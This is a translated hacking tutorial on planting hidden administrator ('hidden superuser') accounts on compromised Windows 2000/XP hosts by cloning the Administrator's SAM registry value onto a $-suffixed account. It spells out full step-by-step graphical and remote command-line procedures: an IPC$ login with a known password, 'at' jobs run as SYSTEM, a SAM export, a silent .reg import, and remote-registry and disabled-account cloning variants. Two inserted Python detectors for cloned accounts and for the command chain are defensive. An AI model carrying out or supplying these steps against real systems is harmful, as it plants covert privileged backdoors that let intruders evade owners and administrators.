How to create a hidden super user in the graphical interface
The graphical method suits a local machine or a compromised host that has Terminal Services (port 3389) open. The author I mentioned above described a method that works well but is more complicated, and it also needs Psu.exe (a program that runs another program as the SYSTEM user), which means uploading psu.exe to the compromised host. The method described here does not need psu.exe. Windows 2000 has two registry editors: Regedit.exe and Regedt32.exe. On XP, Regedit.exe and Regedt32.exe are actually one program, and key permissions are changed by right-clicking a key and choosing "Permissions". Everyone is familiar with Regedit.exe, but it cannot set permissions on registry keys; the biggest advantage of Regedt32.exe is that it can. On NT/2000/XP the account information is stored under the HKEY_LOCAL_MACHINE\SAM\SAM key, which no user other than SYSTEM is authorized to read, so I first use Regedt32.exe to give myself "Full Control" permission on the SAM key. This allows reading and writing the information under the SAM key. The concrete steps are as follows:
1. Assuming that we are logged on to a compromised host through Terminal Services as the superuser Administrator, first create an account, hacker$, at the command line or in the account manager. Here I create the account at the command line:
net user hacker$ 1234 /add
2. In Start/Run, type Regedt32.exe and press Enter to run Regedt32.exe.
3. Click "Permissions"; a window pops up.
Click Add to add the account I am logged in with to the security list. I am logged in as Administrator here, so I add Administrator and set its permission to Full Control. Note: it is better to add the account you are logged in with (or its group) than to modify the existing accounts or groups, otherwise it causes a series of unnecessary problems. Once the hidden superuser has been built, come back here and delete the account you added.
4. Then click "Start" → "Run", type "Regedit.exe" and press Enter to start the Registry Editor Regedit.exe. Open the key:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$
5. Export the items hacker$, 00000409 and 000001F4 as Hacker.reg, 409.reg and 1f4.reg, and open these exported files with Notepad for editing: copy the value "F" under the superuser's key 000001F4 and use it to overwrite the value "F" in the item 00000409 that corresponds to hacker$, then merge 00000409.reg with Hacker.reg.
6. At the command line, delete the user hacker$:
net user hacker$ /del
7. In the Regedit.exe window, press F5 to refresh, then use File → Import to import the modified Hacker.reg into the registry.
8. At this point the hidden superuser hacker$ has been built; close Regedit.exe. In the Regedt32.exe window, change the permissions on the HKEY_LOCAL_MACHINE\SAM\SAM key back to the original (just delete the added account Administrator).
9. Note: once the hidden superuser is built, hacker$ cannot be seen in the account manager, nor with the "net user" command at the command line. After the superuser has been established, however, you can no longer change its password: if you change the hacker$ password with the net user command, the hidden superuser becomes visible again in the account manager and cannot be deleted.
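A defender can check an exported copy of the Users key for the result of step 5. The following is an added example, not part of the original article: it parses .reg export text and flags any account key whose "F" value carries a different RID than the key it sits under. The RID offset 0x30 inside "F", the function names and the sample export are assumptions constructed for illustration.

```python
import re
import struct

USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
RID_KEY = re.compile(re.escape(USERS) + r"\\([0-9A-Fa-f]{8})$")
NAME_KEY = re.compile(re.escape(USERS) + r"\\Names\\(.+)$")

def parse_reg(text):
    """Return ({rid: F bytes}, {account name: rid}) from .reg export text."""
    text = text.replace("\r\n", "\n").replace("\\\n", "")  # join hex continuations
    f_values, names, key = {}, {}, ""
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith("@=hex(") and NAME_KEY.match(key):
            # The type of a Names\<account> default value is that account's RID.
            rid = int(line[6:line.index(")")], 16)
            names[NAME_KEY.match(key).group(1)] = rid
        elif line.startswith('"F"=hex:') and RID_KEY.match(key):
            rid = int(RID_KEY.match(key).group(1), 16)
            f_values[rid] = bytes.fromhex(line[8:].replace(",", ""))
    return f_values, names

def find_cloned_accounts(text):
    """List (name, key RID, RID stored in F) where the two RIDs disagree."""
    f_values, names = parse_reg(text)
    by_rid = {rid: name for name, rid in names.items()}
    findings = []
    for rid, f in sorted(f_values.items()):
        if len(f) < 0x34:
            continue
        # Assumption (not from the page): F holds the account RID as a
        # little-endian DWORD at offset 0x30, so a copied F keeps the donor RID.
        (f_rid,) = struct.unpack_from("<I", f, 0x30)
        if f_rid != rid:
            findings.append((by_rid.get(rid, "<no Names entry>"), rid, f_rid))
    return findings

def sample_f(rid):  # constructed 0x50-byte F value: zeros except the RID field
    raw = bytearray(0x50)
    struct.pack_into("<I", raw, 0x30, rid)
    return ",".join(f"{b:02x}" for b in raw)

# Constructed export: key 00000409 (hacker$) holds a copy of 000001F4's F.
SAMPLE = "Windows Registry Editor Version 5.00\n" + "".join(
    f'\n[{USERS}\\{key:08X}]\n"F"=hex:{sample_f(f_rid)}\n'
    f"\n[{USERS}\\Names\\{name}]\n@=hex({key:x}):\n"
    for name, key, f_rid in [("Administrator", 0x1F4, 0x1F4),
                             ("Guest", 0x1F5, 0x1F5), ("hacker$", 0x409, 0x1F4)])
```

Exports in the "Version 5.00" format are UTF-16 encoded, so decode the file before passing its text to find_cloned_accounts.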
How to create a hidden superuser remotely from the command line
The at command is used here: a scheduled task created with at runs as SYSTEM, so the Psu.exe program is not needed. To use the at command, the compromised host must have the Schedule service running; if it is not running, it can be started remotely with Netsvc.exe from the Streamer tools or with Sc.exe. Other methods work too, as long as the Schedule service gets started.
For the command-line method you can use a variety of connection methods, such as SqlExec against MSSQL on port 1433, or the Telnet service, as long as you get a command shell and have permission to run the at command.
1. First find a compromised host; how to find one is not the topic here. Let's assume that we have found one with a superuser Administrator whose password is 12345678, and that we now start to create a hidden superuser on it remotely from the command line. (The host in the example is a machine on my local area network, and I have changed its IP address to 13.50.97.238. Please do not try this address on the Internet, so as to avoid harassing a normal IP address.)
2. First establish a connection to the compromised host. The command is: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
3. Use the at command to create a user on the compromised host (if the at service is not started, start it remotely with Banyan's Netsvc.exe or with sc.exe):
at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add
The user name is created with a trailing $ character: with the $ added, the user is not displayed by net user at the command line, but it can still be seen in the account manager.
4. Also use the at command to export the HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users key:
at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
/e is a regedit.exe parameter, and the key name HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with a backslash (\). If necessary, you can enclose c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ in quotation marks.
5. Download Hacker.reg from the compromised host to your own computer and open it with Notepad for editing. The command is:
copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg
The editing method was described in the graphical-interface section and is not repeated here.
6. Copy the edited Hacker.reg back to the compromised host:
copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
7. Check the time on the compromised host with net time \\13.50.97.238, then use the at command to delete the user hacker$:
at \\13.50.97.238 13:40 net user hacker$ /del
8. Verify that hacker$ has been deleted. Disconnect from the compromised host with:
net use \\13.50.97.238 /del
Then try to connect to the compromised host with the account hacker$:
net use \\13.50.97.238\ipc$ "1234" /user:"hacker$"
If the connection fails, the account has been deleted.
9. Then set up a connection to the compromised host again: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
Get the time on the compromised host, then use the at command to import hacker1.reg into its registry:
at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
The regedit.exe parameter /s means quiet mode.
10. Then verify that hacker$ has been established, using the same method as above for verifying that hacker$ was deleted.
11. Then verify whether the user hacker$ has read, write and delete permissions; if you are still not convinced, you can also check whether it can create other accounts.
12. From step 11 it can be concluded that the user hacker$ has superuser rights: the account I originally created with the at command was an ordinary user, but it now has remote read, write and delete permissions.
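The command sequence in steps 3 to 9 leaves a recognisable trail in process command lines. This added example, which is not from the original article, flags a $-suffixed account that is created and then deleted, with a SAM export seen, before a silent .reg import. The rule names, function names and sample command lines are constructed for illustration.

```python
import re

# One pattern per command in the procedure, matched against process command lines.
RULES = {
    "create": re.compile(r"\bnet(?:\.exe)?\s+user\s+(\S+\$)\s+.*/add\b", re.I),
    "delete": re.compile(r"\bnet(?:\.exe)?\s+user\s+(\S+\$)\s*/del", re.I),
    "sam_export": re.compile(r"\bregedit(?:\.exe)?\s*/e\s+\S+\s+\S*\\SAM\\SAM\b", re.I),
    "silent_import": re.compile(r"\bregedit(?:\.exe)?\s*/s\s+\S+\.reg\b", re.I),
}

def classify(cmdline):
    """Return (stage, account or None) for a matching command line, else None."""
    for stage, pattern in RULES.items():
        m = pattern.search(cmdline)
        if m:
            return stage, (m.group(1).lower() if m.groups() else None)
    return None

def hidden_account_chains(cmdlines):
    """Accounts created and deleted, with a SAM export seen, before a silent import."""
    created, deleted, exported, hits = set(), set(), False, []
    for line in cmdlines:
        stage, account = classify(line) or (None, None)
        if stage == "create":
            created.add(account)
        elif stage == "sam_export":
            exported = True
        elif stage == "delete" and account in created:
            deleted.add(account)
        elif stage == "silent_import" and exported and deleted:
            hits.extend(sorted(deleted))    # import after delete: account may be back
            deleted.clear()
    return hits

# Constructed sample: the article's commands mixed with unrelated account activity.
SAMPLE = [
    r"c:\winnt\system32\net.exe user hacker$ 1234 /add",
    r"c:\winnt\system32\net.exe user alice Passw0rd /add",
    r"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users",
    r"c:\winnt\system32\net.exe user alice /del",
    r"net user hacker$ /del",
    r"c:\winnt\regedit.exe /s hacker1.reg",
]
```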
Third, what if the compromised host does not have Terminal Services (3389) open and I do not want to use the command line?
In this case you can still use the graphical interface to create a hidden superuser on the compromised host remotely. Regedit.exe and Regedt32.exe can both connect to a network registry, so you can use Regedt32.exe to set permissions on the remote host's registry keys and Regedit.exe to edit the remote registry. The account manager can also connect to another computer, so you can use it to create and delete accounts on the remote host. The concrete steps are similar to those introduced above, so I will not say much; the only thing is that its speed is really unbearable.
There are two prerequisites: 1. Establish a connection to the remote host with net use \\<compromised host IP>\ipc$ "password" /user:"superuser name"; after that you can connect to the remote host with Regedit.exe, Regedt32.exe and the account manager.
2. The remote host must have the Remote Registry service running (if it is not, you can start it remotely, because you have the superuser's password).
Use a disabled account to create a hidden superuser
1. First find out which users the administrator has disabled. For security reasons administrators usually disable Guest, and of course they may disable other users as well. In the graphical interface this is very easy: a disabled account shows a red cross in the account manager. At the command line I haven't figured out a good way; the only option is to check whether a user is disabled with the command "net user username".
2. Here we assume that the user hacker has been disabled by the administrator. First I use Banyan's superuser cloning program CA.exe to clone the disabled user hacker into a superuser (after cloning, the disabled user hacker is automatically activated): CA.EXE <compromised host IP> Administrator <superuser password> hacker <hacker password>.